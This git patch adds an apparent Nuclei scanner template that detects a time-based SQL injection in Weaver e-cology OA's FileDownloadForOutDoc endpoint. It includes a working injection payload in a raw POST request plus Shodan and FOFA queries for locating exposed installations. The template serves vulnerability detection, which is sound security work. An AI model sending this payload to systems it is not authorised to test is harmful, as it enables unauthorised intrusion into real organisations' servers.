From 6f656fcc2e63e44a324ba1ad076c937b9853ed36 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 11 Aug 2023 11:14:21 +0530
Subject: [PATCH] Create ecology-oa-file-sqli.yaml

---
 .../other/ecology-oa-file-sqli.yaml           | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/vulnerabilities/other/ecology-oa-file-sqli.yaml

diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
new file mode 100644
index 0000000000..6398b97fd3
--- /dev/null
+++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
@@ -0,0 +1,32 @@
+id: ecology-oa-file-sqli
+
+info:
+  name: e-cology FileDownloadForOutDocSQL - SQL Injection
+  author: momika233
+  severity: high
+  description: |
+    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+  reference:
+    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology-oa,sqli
+
+http:
+  - raw:
+      - |
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}      
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:5'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+          - 'contains(set_cookie, "ecology_JSessionid=")'
+        condition: and